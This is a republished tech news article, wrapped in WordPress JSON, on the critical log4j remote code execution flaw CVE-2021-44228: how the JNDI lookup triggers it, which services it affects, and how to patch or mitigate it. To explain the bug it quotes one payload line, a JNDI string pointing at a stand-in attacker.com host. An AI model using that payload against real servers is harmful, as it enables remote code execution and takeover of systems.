{"id":379232,"date":"2021-12-10T17:16:36","date_gmt":"2021-12-10T14:16:36","guid":{"rendered":"https:\/\/en.buradabiliyorum.com\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it\/"},"modified":"2021-12-10T17:16:36","modified_gmt":"2021-12-10T14:16:36","slug":"critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it","status":"publish","type":"post","link":"https:\/\/buradabiliyorum.com\/en\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it\/","title":{"rendered":"#Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j, Affects Much Of The Internet \u2013 CloudSavvy IT"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_84 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-6a2459f13489c\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #dd3333;color:#dd3333\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #dd3333;color:#dd3333\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-6a2459f13489c\" checked aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/buradabiliyorum.com\/en\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it\/#How_Does_This_Work\" >How Does This Work?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/buradabiliyorum.com\/en\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it\/#How_Do_I_Fix_It\" >How Do I Fix It?<\/a><\/li><\/ul><\/nav><\/div>\n<p><strong>&#8220;#Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j, Affects Much Of The Internet \u2013 CloudSavvy IT&#8221;<\/strong><\/p>\n<div id=\"article-content-area\">\n<img loading=\"lazy\" decoding=\"async\" class=\"type:primaryImage alignnone size-full wp-image-15045\" data-pagespeed-lazy-srcset=\"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png?width=398&amp;trim=1,1&amp;bg-color=000&amp;pad=1,1 400w, https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png?width=1198&amp;trim=1,1&amp;bg-color=000&amp;pad=1,1 1200w\" sizes=\"auto, 400w, 1200w\" data-pagespeed-lazy-src=\"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png?width=1198&amp;trim=1,1&amp;bg-color=000&amp;pad=1,1\" alt=\"\" width=\"675\" height=\"350\" src=\"\/pagespeed_static\/1.JiBnMqyl6S.gif\" onload=\"pagespeed.lazyLoadImages.loadIfVisibleAndMaybeBeacon(this);\" onerror=\"this.onerror=null;pagespeed.lazyLoadImages.loadIfVisibleAndMaybeBeacon(this);\"\/><\/p>\n<p>A critical remote code execution vulnerability has been found in log4j, a very popular logging tool used by most of the industry. It\u2019s extremely severe, affecting nearly every server running Java, and is very simple to exploit, so you will want to update and mitigate the issue ASAP.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"How_Does_This_Work\"><\/span>How Does This Work?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The bug, tracked by <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/advisories\/GHSA-jfh8-c2jp-5v3q\">CVE-2021-44228<\/a>, likely affects almost any Java <a href=\"https:\/\/buradabiliyorum.com\/en\/category\/download-scripts-themes-apps\/\" data-internallinksmanager029f6b8e52c=\"9\" title=\"Download Scripts &amp; Themes &amp; Apps\" target=\"_blank\" rel=\"noopener\">app<\/a>lication using <code>log4j<\/code>, which is quite a few considering how ubiquitous it is. If your application ever logs a string sent in by a user, it\u2019s probably vulnerable. As far as exploits go, it\u2019s one of the worst ones this year, as it can target basically any server running Java in some fashion (though the primary attack vector may be harder on modern JDK versions, more on that below).<\/p>\n<p>Essentially, the exploit allows an attacker to send your server any string like the following, and if it logs it somewhere in your app, <em>your server will execute code hosted at that address<\/em>.<\/p>\n<pre>${jndi:ldap:\/\/attacker.com\/a}<\/pre>\n<p>This works because, when parsing this uniquely formatted string, <code>log4j<\/code>\u00a0will make a request through the <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.blackhat.com\/docs\/us-16\/materials\/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf\">Java Naming and Directory Interface<\/a>, which ends up sending a download request to an arbitrary endpoint. It downloads and deserializes the <code>.class<\/code>\u00a0file in an insecure manner. Because Java classes can have static initializers that run whenever the class is compiled and referenced, this results in remote arbitrary code execution from a simple, short string. For example, a client could set their user-agent to this string, or otherwise include it in a request, and when your server logs it, it will trigger the exploit.<\/p>\n<p>That\u2019s pretty horrible, scoring a 9.8 on the CVSS scale. It falls just shy of the worst score, as despite how awful it is, it doesn\u2019t affect any resources outside the scope of the targeted system (but does give application-level access to the server running the logger).<\/p>\n<p><strong>RELATED:<\/strong> <strong><em>How Are Security Vulnerabilities Ranked? (CVSS)<\/em><\/strong><\/p>\n<p>It\u2019s going to affect a lot of applications. For example, Minecraft was one of the first to spread the <a href=\"https:\/\/buradabiliyorum.com\/en\/category\/news\/\" data-internallinksmanager029f6b8e52c=\"2\" title=\"News\" target=\"_blank\" rel=\"noopener\">news<\/a> and patch the exploit, as it was possible to execute code both on servers and on all players connected to a server through the in-<a href=\"https:\/\/buradabiliyorum.com\/en\/category\/game\/\" data-internallinksmanager029f6b8e52c=\"7\" title=\"Game\" target=\"_blank\" rel=\"noopener\">game<\/a> chat messages. An hotfix update for the game was released to patch the bug.<\/p>\n<p>Popular services like Steam and iCloud have already been found to be vulnerable, and security research firm GreyNoise has already detected multiple IPs running scans for vulnerable servers.<\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\">\n<p lang=\"en\" dir=\"ltr\"><a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/twitter.com\/greynoise?ref_src=twsrc%5Etfw\">@GreyNoise<\/a> is currently seeing 2 unique IP&#8217;s scanning the internet for the new Apache Log4j RCE vulnerability (No CVE assigned yet).<br \/>A tag to track this activity on <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/t.co\/QckU3An40q\">https:\/\/t.co\/QckU3An40q<\/a> will be made available shortly and linked as a reply when released.<\/p>\n<p>\u2014 remy\ud83d\udc00 (@_mattata) <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/twitter.com\/_mattata\/status\/1469144854672379905?ref_src=twsrc%5Etfw\">December 10, 2021<\/a><\/p>\n<\/blockquote>\n<p>You\u2019re probably already running <code>log4j<\/code>, as it\u2019s included in hundreds of other libaries as the standard logging tool. However, JDK versions greater than\u00a0<code>6u211<\/code>,\u00a0<code>7u201<\/code>,\u00a0<code>8u191<\/code>, and\u00a0<code>11.0.1<\/code>\u00a0are not affected by the primary attack vector\u00a0 (using LDAP) that\u2019s being exploited right now. That isn\u2019t to say you shouldn\u2019t update, since the bug in <code>log4j<\/code>\u00a0+ JNDI is still severe, and can easily be <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.veracode.com\/blog\/research\/exploiting-jndi-injections-java\">used with other attack vectors as well<\/a>.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"How_Do_I_Fix_It\"><\/span>How Do I Fix It?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Luckily, there is already a fix that patches it entirely, so you should update your servers ASAP. This affects client applications as well though, which also need to update for this critical patch. After all, 3 billion devices run Java, so it\u2019s going to be a while before it\u2019s fully fixed.<\/p>\n<p>The exploit has already been patched in <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/apache\/logging-log4j2\/releases\/tag\/log4j-2.15.0-rc2\"><code>log4j<\/code>\u2018s latest release, 2.15.0-rc2<\/a>, so you should update that if you can. The patch has also been backported to earlier versions, given the severity for users who may be stuck on legacy releases.<\/p>\n<p>If you\u2019re using another library that uses <code>log4j<\/code>, you should still be able to manually update in most cases, but if you can\u2019t, you can use this JVM flag to mitigate the issue, which simply tells <code>log4j<\/code>\u00a0to never do any lookups when formatting messages.<\/p>\n<pre>-Dlog4j2.formatMsgNoLookups=true<\/pre>\n<\/div>\n<p><script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote><p><strong><span style=\"color: #ff6600;\">If you liked the article, do not forget to share it with your friends. Follow us on\u00a0<span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https:\/\/news.google.com\/publications\/CAAqBwgKMLG0nwswvr63Aw\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Google News<\/a><\/span>\u00a0too, click on the star and choose us from your favorites.<\/span><\/strong><\/p><\/blockquote>\n<blockquote>\n<p style=\"text-align: center;\">For forums sites go to <span style=\"color: #ff9900;\"><a style=\"color: #ff9900;\" href=\"https:\/\/forum.buradabiliyorum.com\/\" target=\"_blank\" rel=\"noopener\">Forum.BuradaBiliyorum.Com<\/a><\/span><\/strong>\n<\/p><\/blockquote>\n<blockquote>\n<p style=\"text-align: center;\"><strong>If you want to read more like this article, you can visit our <span style=\"color: #ff9900;\"><a style=\"color: #ff9900;\" href=\"https:\/\/en.buradabiliyorum.com\/technology\/\" target=\"_blank\" rel=\"noopener\">Technology category.<\/a><\/span><\/strong><\/p>\n<\/blockquote>\n<p><span style=\"color: black;\"><a style=\"color: #ff9900;\" href=\"https:\/\/www.cloudsavvyit.com\/15042\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet\/\" target=\"_blank\" rel=\"noopener\">Source<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;#Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j, Affects Much Of The Internet \u2013 CloudSavvy IT&#8221; A critical remote code execution vulnerability has been found in log4j, a very popular logging tool used by most of the industry. It\u2019s extremely severe, affecting nearly every server running Java, and is very simple to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":379233,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png","fifu_image_alt":"","footnotes":""},"categories":[18],"tags":[],"class_list":["post-379232","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology"],"_links":{"self":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/379232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/comments?post=379232"}],"version-history":[{"count":0,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/379232\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media\/379233"}],"wp:attachment":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media?parent=379232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/categories?post=379232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/tags?post=379232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}